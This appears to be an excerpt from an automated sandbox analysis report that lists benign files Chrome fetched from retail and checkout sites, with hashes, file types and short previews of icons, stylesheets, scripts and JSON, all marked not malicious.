                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:N7+CIl/X2YlXWI2PULxZtaZnLx4HvffKPN9/QlOkodL9Vw+BdvBrtpmkzFzk5:NBIl/XflVxLaZnl4nsFPVBdRiiM
                                                                                                                                                                                    MD5:030342ACD89619F15E374D50F8FBA143
                                                                                                                                                                                    SHA1:A7853F29D6CA5C9B84DE5BD48BBF361266005353
                                                                                                                                                                                    SHA-256:C233954CC1237EB17036F022AE6B052A8ACCBFA16B7D2D1678620A225AE1FD90
                                                                                                                                                                                    SHA-512:D4C47F9738703547CA33C1B19C69CF5838416F3918389997FD8156EBF08EE332BBD484D5433B1664D8D2F2CFF2FEFC6332BC176038FCBA805FF1BFD3ED0BA086
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................P...........P...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......P.P......................................................................................0V..........V.c~f..4...\...'.YL...=&......@mO@..v...}]y]S.....m*......|6...1..T.m...z..v/Y^.....l..R...iYv...v..d..S...6..........
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):65
                                                                                                                                                                                    Entropy (8bit):4.314128390879881
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:2erWeKBRk35KLWAzRERxzfRX/H4Y3:29M3tRdfZN
                                                                                                                                                                                    MD5:83A02FE42F8C2198E7C608AFF363AA49
                                                                                                                                                                                    SHA1:7B20AE1014450492CC708E3C9DC7522B05C2EFFD
                                                                                                                                                                                    SHA-256:E64954DC34E12C7190CC2338A54B07644FF0F102AA71CC7209BCBB49C3009F7C
                                                                                                                                                                                    SHA-512:CD381A8C725C892E9A68D713254A31EA9ED25A39B212A5DC52D4BA2655F38AFDDB32519F03360F32A59D8E7701AF6C2AD0030A6AA760C3DE87C75063F5B65F54
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:event: message.data: {"response":{"status_code":200,"body":""}}..
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):9497
                                                                                                                                                                                    Entropy (8bit):3.803329550188562
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:Ma39m2jfdpWhi7T/lyoRk+jFikczjlNjGNHckh8TlwHGNw5nzXl1PnkymQ/eETaJ:t95jfdQ87q+jIRzjlNj28QGNmrNWO1Qr
                                                                                                                                                                                    MD5:871FBAB3856A9FCC30768C3B7ED875AF
                                                                                                                                                                                    SHA1:C9A6C3FB54704A4C5EBA36C40F9200DA83F7E2D7
                                                                                                                                                                                    SHA-256:D0917DF1FF1EE7072978E78DB5489CD7A3CFABF1EF201484CB4228BBAA222BB6
                                                                                                                                                                                    SHA-512:3955022DC365602DC133BDEA941DA8578E1099C9C349B1A05D45C0BD23836D4E349C1465332AEE87D266E867F12D8863ABF0D96609815BE81923BD6C906F6A0B
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 194 40" height="40" width="194">.<path fill="white" d="M34.2235 9.53755L25.5832 14.587V24.3493L16.9435 29.6229L8.6404 24.6858V34.3358L16.9435 39.2728L34.2235 29.2863V9.53755ZM17.2801 9.64993L25.5832 14.587V4.93705L17.2801 0L0.00012207 9.98648V29.7347L8.6404 24.6858L8.63982 14.9235L17.2801 9.64993Z" clip-rule="evenodd" fill-rule="evenodd"></path>.<path fill="white" d="M47.3635 19.8779C47.3635 20.8205 47.4682 21.7421 47.6777 22.6427C47.9081 23.5225 48.2642 24.3184 48.7459 25.0305C49.2276 25.7427 49.856 26.3187 50.631 26.7585C51.406 27.1774 52.3485 27.3869 53.4586 27.3869C54.5688 27.3869 55.5113 27.1774 56.2863 26.7585C57.0613 26.3187 57.6896 25.7427 58.1714 25.0305C58.6531 24.3184 58.9987 23.5225 59.2082 22.6427C59.4386 21.7421 59.5538 20.8205 59.5538 19.8779C59.5538 18.8935 59.4386 17.9405 59.2082 17.0189C58.9987 16.0973 58.6531 15.2804 58.1714 14.5683C57.6896 13.8352 57.0613 13.2592 56.2863 12.8402C55.5113 12.4004 54.5688
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (2020)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2132
                                                                                                                                                                                    Entropy (8bit):5.410644401574348
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:MKQhST64UYFBi233zt46wWASm9uGLfWWdl89NoYbkKKsXiZacadDSrhqcwFOKCpg:YC6p4i23326UtLuKdkyKFV0s7xNv
                                                                                                                                                                                    MD5:B847331248ACA291BB011B831B9CC0B5
                                                                                                                                                                                    SHA1:B9255D676FE8D59EDE449AC8CFEDD5A4C5CFDEB0
                                                                                                                                                                                    SHA-256:06F8FC6E21097DEAF1CAA113DE5A24E10797700E8D71B40C5802B88BFACD13B5
                                                                                                                                                                                    SHA-512:73A27D71ED1A313C709627AC8C1E35F8DC963473C74BBE570272DB23D49A4449B90E85980F255D7A2EF5B49FA77658319D44B83FE09C51320808A1925ED95A07
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:window.VSEARCH_UTILS=function(){const requires=["products"],ranges=["price"],restrictions=["brand","promotion"],nonFacetKeys=["q","page","selectedSort","maxPerPage","taxonomyId"];function buildAttributes(input){const attributes={};return Object.keys(input).forEach(key=>{!restrictions.includes(key)&&!ranges.includes(key)&&!nonFacetKeys.includes(key)&&(attributes[key]={id:key,values:Array.isArray(input[key])?input[key]:[input[key]]})}),attributes}function getDeviceType(){const userAgent=navigator.userAgent.toLowerCase();return/mobile|android|iphone|ipod|blackberry|iemobile|opera mini/i.test(userAgent)||window.innerWidth<=600?"MOBILE_WEB":"DESKTOP"}function sanitize(url){const parser=document.createElement("a");parser.href=url;const protocol="https:",host=parser.host.replace(/[^a-zA-Z0-9.-]/g,""),pathname=parser.pathname.replace(/[^a-zA-Z0-9\/._-]/g,""),search=parser.search.replace(/[^a-zA-Z0-9&=_-]/g,"");return`${protocol}//${host}${pathname}${search}`}return{prepareRequestBodyParams:fun
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):246
                                                                                                                                                                                    Entropy (8bit):4.744852095255021
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6:sTTR1DnNxxl98gzqsDPWEgcSKgvXa9EwMTRvcSEKv:sJ1DNxeodoTKgvgoZThv
                                                                                                                                                                                    MD5:1E05A81C6647B91CC227591AD7584653
                                                                                                                                                                                    SHA1:B3401479BE40B77BAA07526B9B721B297F1DD7F9
                                                                                                                                                                                    SHA-256:3A2580842B709E881EA6C57395AB78749A69F573998A35EA86175DB63755AC3A
                                                                                                                                                                                    SHA-512:9BC5BC59EA942DF584AD8CB2B04F681FEA36A2465266E8B2E2F242F0478E2E29335ABC5F95C1316F55993707EEE29A3CEA4160DAE4C427C09B08834CEFC1C51F
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/assets/PayButtonSection.DF7trkKf.css
                                                                                                                                                                                    Preview:.zdTmQ{position:relative;padding-bottom:env(safe-area-inset-bottom);margin:0;height:109px;overflow:hidden;border-top:1px solid var(--x-default-color-border);box-shadow:var(--x-box-shadow-small);background-color:var(--x-default-color-background)}.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1180
                                                                                                                                                                                    Entropy (8bit):4.735747819786574
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:YMIfJeLifktZLaQkKLVb+mLww2qSLI2LAtmLjf47LIJQbCLKAVLV:YBULGktZLasLVbRLCLfLJL747LIJ8CLT
                                                                                                                                                                                    MD5:86EF79925E6257D174BAA5EBFA87B95E
                                                                                                                                                                                    SHA1:C009A847DF9BB796382301AD25BAA0BFB4DC81E0
                                                                                                                                                                                    SHA-256:A7263755826CD7DD0AB5CBA7CCC8CAF3C6AE7A84A8C44761B0938B83BCD5F894
                                                                                                                                                                                    SHA-512:91FDEC79AFA335765990A9DEBC8063EED3C0752DECBF21321BC36908A33B8D085DBFA975174148186EE4F18A6EA47C9B4D588DA3A0E0514D69B6CCEB2692CE7E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{"name":"snippet","results":[{"page_id":"34310807","rollup":{"average_rating":4.06,"rating_count":53,"review_count":53,"answered_questions":0}},{"page_id":"34492291","rollup":{"average_rating":4.73,"rating_count":41,"review_count":41,"answered_questions":0}},{"page_id":"34645678","rollup":{"average_rating":4.32,"rating_count":66,"review_count":66,"answered_questions":0}},{"page_id":"34930030","rollup":{"average_rating":4.59,"rating_count":71,"review_count":71,"answered_questions":0}},{"page_id":"35479173","rollup":{"average_rating":4.77,"rating_count":30,"review_count":30,"answered_questions":0}},{"page_id":"40649229","rollup":{"average_rating":4.24,"rating_count":50,"review_count":50,"answered_questions":0}},{"page_id":"8101775","rollup":{"average_rating":4.32,"rating_count":25,"review_count":25,"answered_questions":0}},{"page_id":"20340282","rollup":{"average_rating":4.55,"rating_count":467,"review_count":467,"answered_questions":0}},{"page_id":"26567245","rollup":{"average_rating":4
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1471
                                                                                                                                                                                    Entropy (8bit):4.5475358436836135
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:t3JfDut5QlA7k6/+ggshwmTcaQlA7k6/+ggshwmTcGWQWytgL/FnXfHR0prstdk7:3flArHgxtlArHgxGWQWytgL/F/Rz4
                                                                                                                                                                                    MD5:F3DDA33BF5FB24583534BD41E758FB25
                                                                                                                                                                                    SHA1:2FD3D57ED95BCD3D004D5F94BB7431C0BB7180A8
                                                                                                                                                                                    SHA-256:64BA853ACB4A3F8358656E2AFBEA7A40B1832B4F902BA082B61DD9A2B555D09B
                                                                                                                                                                                    SHA-512:19EED73C1FA43632D2F57EA650FBF68450D22AA18E5A08287F5835303B29084C450F7E80C08AE9451B67F52072EE2E8BED156CB4CE7C0168EAD1AE519A58A3CE
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:<svg width="14" height="14" viewBox="0 0 14 14" fill="none" xmlns="http://www.w3.org/2000/svg">.<g clip-path="url(#clip0_393_920)">.<path d="M5.4365 4.77644L7 0.965174L8.5635 4.77644C8.66194 5.01641 8.88513 5.19598 9.159 5.22265L13.1482 5.61105L10.1207 8.40306C9.92635 8.58228 9.84785 8.84948 9.90151 9.0994L10.7802 13.192L7.37658 11.0705C7.1456 10.9265 6.8544 10.9265 6.62342 11.0705L3.21981 13.192L4.09849 9.09941C4.15215 8.84948 4.07365 8.58228 3.87932 8.40306L0.851766 5.61105L4.84099 5.22265C5.11487 5.19598 5.33806 5.01641 5.4365 4.77644Z" stroke="#252525"/>.<path d="M5.4365 4.77644L7 0.965174L8.5635 4.77644C8.66194 5.01641 8.88513 5.19598 9.159 5.22265L13.1482 5.61105L10.1207 8.40306C9.92635 8.58228 9.84785 8.84948 9.90151 9.0994L10.7802 13.192L7.37658 11.0705C7.1456 10.9265 6.8544 10.9265 6.62342 11.0705L3.21981 13.192L4.09849 9.09941C4.15215 8.84948 4.07365 8.58228 3.87932 8.40306L0.851766 5.61105L4.84099 5.22265C5.11487 5.19598 5.33806 5.01641 5.4365 4.77644Z" stroke="#252525"/>.<p
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (26964)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):46416
                                                                                                                                                                                    Entropy (8bit):5.342125860102581
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:dgLivxJv6rqgLInXZZZx6+VWjq0Lui7A9GzUkrpBRAuME+nIFB63n3HenhNN5UND:WLivLv6rLLInXZZZx6+VWu0LuisYhpbS
                                                                                                                                                                                    MD5:ED61DDC0302AF75023903D02BE8BCE12
                                                                                                                                                                                    SHA1:85BE4ECE15E1F126504D388CCA12D40F2B7D4CD2
                                                                                                                                                                                    SHA-256:9CC426B414328491766A478831D40D766519ABA9D7D2B5313005CDBF0596C2FC
                                                                                                                                                                                    SHA-512:8E9C99F660BF9EBFF393FD8B1E3D5991B297D293B91C1BD8A642EF04FD764003B16EB894245BDB50B72A718E2A15080B20B4034CE4D4D68F5223CE32E4B0F8DF
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:!function(){var Sizzle=(function(e){var t,n,r,i,o,u,l,a,c,s,f,d,p,h,g,m,y,w,v,b="sizzle"+1*new Date,N=e.document,x=0,C=0,E=oe(),D=oe(),A=oe(),T=function(e,t){return e===t&&(f=!0),0},S={}.hasOwnProperty,L=[],I=L.pop,q=L.push,B=L.push,R=L.slice,$=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},k="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",P="[\\x20\\t\\r\\n\\f]",H="(?:\\\\.|[\\w-]|[^\0-\\xa0])+",M="\\["+P+"*("+H+")(?:"+P+"*([*^$|!~]?=)"+P+"*(?:'((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\"|("+H+"))|)"+P+"*\\]",F=":("+H+")(?:\\((('((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\")|((?:\\\\.|[^\\\\()[\\]]|"+M+")*)|.*)\\)|)",O=new RegExp(P+"+","g"),j=new RegExp("^"+P+"+|((?:^|[^\\\\])(?:\\\\.)*)"+P+"+$","g"),z=new RegExp("^"+P+"*,"+P+"*"),G=new RegExp("^"+P+"*([>+~]|"+P+")"+P+"*"),U=new RegExp("="+P+"*([^\\]'\"]*?)"+P+"*\\]","g"),V=new RegExp(F),X=new RegExp("^"+H+"$"),J={ID:new
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (558), with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):558
                                                                                                                                                                                    Entropy (8bit):5.382800211774974
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12:LNMLZNVrwUX4fU2WqinRqgaQh6A/5FkWATWfFI:RMfVrwASU2IAgLNTM
                                                                                                                                                                                    MD5:C1967BB0CBB6C04C3070A182DE8F920E
                                                                                                                                                                                    SHA1:4D0DFDF6B01763B83DE7539B5EC3FE48620CC3BE
                                                                                                                                                                                    SHA-256:DAE6E9E7C1E9C6F474D199C6108848AD89318B72C37D8504C209ECEC58CA0057
                                                                                                                                                                                    SHA-512:C4C719431FFDCEE54766A0D6DDA6455FF1D4A46078AEA6A44DAF85479ADBA77B6438C0FAC8C6687DA16813B4759D03E28138D1425ABB1B57A5359FB196DCE7A6
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.bedbathandbeyond.com/js/service-worker.2.1.0.min.js
                                                                                                                                                                                    Preview:"use strict";self.importScripts("https://storage.googleapis.com/workbox-cdn/releases/3.1.0/workbox-sw.js","https://www.bedbathandbeyond.com/js/".concat("brazesw.2.3.min.js"));var ONE_DAY=86400,FIVE_MINUTES=300,STATIC_CACHE="ostk-static-2.1.0",IMAGES_CACHE="ostk-images-2.1.0",activeCaches=[STATIC_CACHE,IMAGES_CACHE];function removeExpiredCaches(){return caches.keys().then(function(cacheNames){return Promise.all(cacheNames.filter(function(cacheName){return-1===activeCaches.indexOf(cacheName)}).map(function(cacheName){return caches.delete(cacheName)}))})}
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):24
                                                                                                                                                                                    Entropy (8bit):2.459147917027245
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:CUXJ/lH:Dl
                                                                                                                                                                                    MD5:BC32ED98D624ACB4008F986349A20D26
                                                                                                                                                                                    SHA1:2D3DF8C11D2168CE2C27E0937421D11D85016361
                                                                                                                                                                                    SHA-256:0C9CF152A0AD00D4F102C93C613C104914BE5517AC8F8E0831727F8BFBE8B300
                                                                                                                                                                                    SHA-512:71ACC6DA78D5D5BF0EEA30E2EE0AC5C992B00EFEC959077DFE0AB769F1DBBD9AF12D5C5C155046283D5416BEB606A9EF323FB410E903768B1569B69F37075B4E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:GIF89a.......,..........
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (1957)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):2054
                                                                                                                                                                                    Entropy (8bit):5.0844006177477885
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:8hs5TtB3RO/fmHUuMcuIcOFqVsW46i2LYtwOcjxEEsjZihxNR:KABBBO/fmHUuZNt8V3jb0twOWIjZ0T
                                                                                                                                                                                    MD5:D15AD3B82B7105D0CDDF17D1B5802B81
                                                                                                                                                                                    SHA1:04CADFE4AB59B93AD91E32732447DC61923CA9DC
                                                                                                                                                                                    SHA-256:E3DF5A830EC984039F9006C797B66F90AD9C7B733A96C84EBBA778B4FC131696
                                                                                                                                                                                    SHA-512:DB0A969CDEFAA5C269966EA3C9F79461E813964FEDE7EEA777331B4730A9E264AF755AFD7D555114F328EEC6453BF112EA362FA4B32F6E8AF8171F1B7A4B7108
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/t/224/assets/gtag-events.js?v=113738939431907924651730157903
                                                                                                                                                                                    Preview:function createGtagEvents(elements=[],action="click",name="event_name"){window.gtag||console.error("GA4 events could not be established");for(const el of elements)el?.addEventListener(action,function(e){if(name==="header_nav_click"){const textContent=el.innerText.trim();gtag("event",name,{value:textContent})}else gtag("event",name)})}const selectors=[{selector:"store-header a",eventName:"header_nav_click"},{selector:"#cart-icon",eventName:"mini_cart_toggle"},{selector:'button[name="checkout"]',eventName:"begin_checkout"},{selector:"details-disclosure:has(.product-description)",eventName:"product_description_click"},{selector:"media-gallery img",eventName:"product_image_click"},{selector:"details-disclosure:has(#pr-reviewdisplay)",eventName:"reviews_click"}];for(const s of selectors){const el=document.querySelectorAll(s.selector);createGtagEvents(el,"click",s.eventName)}document.querySelectorAll('form:has(input[type="email"])').forEach(emailInput=>{emailInput.addEventListener("submit",e
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (8966)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):9605
                                                                                                                                                                                    Entropy (8bit):5.3791643348616764
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:cmTHRJ1UEuUrK5DBOS0kLrQ13vZ9TETjfUHI1d382D9ZcIQKpfPe/XqMoZT0rY:cml5K5b/LrQ1fZ9TETjMHI1XZcnKpfG4
                                                                                                                                                                                    MD5:E28C0B89B510A91DC75384A877A3088F
                                                                                                                                                                                    SHA1:C73A8059570F247BC68AFF8D7B10038C8A7523E8
                                                                                                                                                                                    SHA-256:95894E15FAD39187210D4CE5DC436C8F379DC7D00362D5F90EE7FAB741224531
                                                                                                                                                                                    SHA-512:8E2F628C88599D32A4FE80C6D462E4244A6DC5D3C13C8807AD07789A8C5AAA456B3678251F2846E5744F965ADF877A089698731AEC3D9CEF318104631EA01DD5
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/PayButtonSection.DAi6V-5g.js
                                                                                                                                                                                    Preview:const __vite__mapDeps=(i,m=__vite__mapDeps,d=(m.f||(m.f=["ShopPayButtonContainer.Bi3TYY-J.js","app.DfgMZONA.js","assets/app.whj6cDzT.css","context.C2MjukUF.js","useIsOriginatedFromShop.7toB9y1y.js","constants.Dgg9iUcT.js","useUnauthenticatedErrorModal.AwvSMfsF.js","Section.Dvvun2gq.js","assets/Section.sQehCocD.css","ShopPayLogo.MmDQrsit.js","assets/ShopPayLogo.D_HPU8Dh.css","Rollup.B0QeYKuB.js","assets/Rollup.o9Mx-fKL.css","useShowShopPayOptin.cjqea2Mu.js","RageClickCapture.BAiET0lR.js","MarketsProDisclaimer.D4Dihv-c.js","assets/RageClickCapture.DnkQ4tsk.css","assets/ShopPayButtonContainer.B0ZxHYBW.css"])))=>i.map(i=>d[i]);.import{e as b,b1 as X,dw as ee,c0 as k,at as te,aW as oe,dW as ne,bf as se,dO as R,a as o,a8 as w,d$ as re,ab as m,aa as f,d_ as ae,ei as ie,ej as ce,ek as ue,c as le,d as v,el as O,K as T,em as I,en as de,eo as pe,ep as he,eq as ye,er as Pe,y as g,es as me,et as V,by as W,eu as ge,ev as fe,ew as be,ex as _e,D as ve,bH as Se,bI as ke,_ as Ce,dz as Be,aG as Ee,ey as
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (14547)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):14859
                                                                                                                                                                                    Entropy (8bit):5.422245602304736
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:ys9X0SCg8UoDthaNyvhCV/KJKWrKFKiL2LKIQNvdNFKyRCLJTsK54:tdCDLDthDQL2IhR8TC
                                                                                                                                                                                    MD5:ED7158A43AFBBE74050CBCD00342CB0B
                                                                                                                                                                                    SHA1:3E429B1B69F91170EE2D2B826F452010FF4D7D30
                                                                                                                                                                                    SHA-256:410E1DF7390B246A2EF4F1D3A511190ED8E724042AEC32DF46E7577E3A95EBC6
                                                                                                                                                                                    SHA-512:89A0BF2FF978E7C380CF2F695C1D65F961E65E9E9F16728F9794851CC4CC6DF8F9C9B1E97FADB18B0D6FCB55AECADE6632028711224DFA894A1DE14E55117FAD
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://gum.criteo.com/syncframe?topUrl=www.bedbathandbeyond.com&origin=onetag
                                                                                                                                                                                    Preview:<!DOCTYPE html>.<html>.<head>. <script type="text/javascript">. window.CONFIG_CSM_DOMAIN_NAME = "csm.nl3.eu.criteo.net";. window.CONFIG_CSM_RATIO = 100;. window.GUM_DOMAIN = "gum.criteo.com";. </script>. <script type="text/javascript">. !function(){"use strict";var i=function(t,e){return(i=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(t,e){t.__proto__=e}||function(t,e){for(var n in e)e.hasOwnProperty(n)&&(t[n]=e[n])})(t,e)};function t(t,e){function n(){this.constructor=t}i(t,e),t.prototype=null===e?Object.create(e):(n.prototype=e.prototype,new n)}var e=function(){return(e=Object.assign||function(t){for(var e,n=1,i=arguments.length;n<i;n++)for(var o in e=arguments[n])Object.prototype.hasOwnProperty.call(e,o)&&(t[o]=e[o]);return t}).apply(this,arguments)};function n(r,s,a,l){return new(a=a||Promise)(function(t,e){function n(t){try{o(l.next(t))}catch(t){e(t)}}function i(t){try{o(l.throw(t))}catch(t){e(t)}}function o(e){e.done?t(e.valu
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (3362)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):3363
                                                                                                                                                                                    Entropy (8bit):4.577882356233035
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:QwmfOLl8vBkPlkVTDoZbcd3/jk2bZc7eZeAvn:hmWlMBkPlkVTDoFKPgmu7eZfn
                                                                                                                                                                                    MD5:39D8E4045EA74D995643C5FE86109B64
                                                                                                                                                                                    SHA1:683D9D7825F79D7DB5959CA3A8946323F39DE101
                                                                                                                                                                                    SHA-256:6058310D39441415A341D4DD6977AE5ACC8B6DA7F6C7C8912EB6A0704EBCEB7F
                                                                                                                                                                                    SHA-512:418473728286E77F5CA85E2A62EB663A86C36A6D81609552939EAA0A4FA151BFA56E3019E6359035DB38B1C9DF2F7F4C8CA475490C0D0F891EC3B21C18E26073
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/ShopPayLogo.MmDQrsit.js
                                                                                                                                                                                    Preview:import{ac as c,ad as t,a as h,ae as m}from"./app.DfgMZONA.js";const o="_8ssCG",v="zS4x6",d="PrlUn",r="SsCEp",p="aTkbO",s={xsmall:o,small:v,medium:d,large:r,inline:p},z=a=>c("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"inherit","aria-hidden":"true",preserveAspectRatio:"xMidYMid",viewBox:"0 0 341 80.035",...a},c("path",{fillRule:"evenodd",d:"M227.297 0c-6.849 0-12.401 5.472-12.401 12.223v55.59c0 6.75 5.552 12.222 12.401 12.222h101.06c6.849 0 12.401-5.472 12.401-12.222v-55.59c0-6.75-5.552-12.223-12.401-12.223zm17.702 55.892v-14.09h8.994c8.217 0 12.586-4.542 12.586-11.423s-4.369-11-12.586-11h-14.788v36.513zm0-31.084h7.664c5.319 0 7.932 2.154 7.932 5.758s-2.518 5.758-7.695 5.758h-7.901zm31.796 31.833c4.417 0 7.314-1.92 8.644-5.196.38 3.65 2.613 5.523 7.457 4.26l.048-3.886c-1.948.187-2.328-.515-2.328-2.528v-9.55c0-5.617-3.752-8.94-10.686-8.94-6.84 0-10.782 3.37-10.782 9.08h5.32c0-2.714 1.947-4.353 5.367-4.353 3.609 0 5.272 1.545 5.224 4.214v1.217l-6.127.655c-6.887.749-10.686 3.324-10.686
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):163
                                                                                                                                                                                    Entropy (8bit):5.297552459436421
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:US9i3USqmKcDXRvFqMPfFQTcZ+1RyUFvNFBIADNHG2JCYWAJDE2JCn+9VRNiWTEc:UXUoKf8fFGpbdvvB91DMKM+3riWwM9I2
                                                                                                                                                                                    MD5:3FFE69064BB323E26EBDDE40AECB8628
                                                                                                                                                                                    SHA1:A5E4370DD1416A345A2F41148BE5B67893C96A7A
                                                                                                                                                                                    SHA-256:FF99032B0E0EC65E9A0B4800B2A497F77556908A10D1458CB2C2DC0D458C3F2A
                                                                                                                                                                                    SHA-512:61F521E411637D77D7EE56AFCB75DCC2716D65C0E2C14FA3AFE589C7CF94496B19D1587A8EF89A3F6C344978E74CF74FF3C6A8960E16D1A9065CD55864E152F1
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ui.powerreviews.com/tag-builds/10461/4.1/js/chunks/136.js
                                                                                                                                                                                    Preview:/*!. * PowerReviews, Copyright 2024. * Build: 10461 | a4644180a | 10/3/2024. */."use strict";(self.pwrClg=self.pwrClg||[]).push([[136],{60136:(s,l,r)=>{r.r(l)}}]);
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ISO Media, AVIF Image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):3718
                                                                                                                                                                                    Entropy (8bit):7.399231559965045
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:rGz9vIl/XujdDFYdsAfwcPYGtUKQnQbN0:rGiujJFYd9wcBUjWG
                                                                                                                                                                                    MD5:179563C87C41EFBB0761A6BF089B77D4
                                                                                                                                                                                    SHA1:E7EC60729F9F93F208314E153C5D92C200CDC162
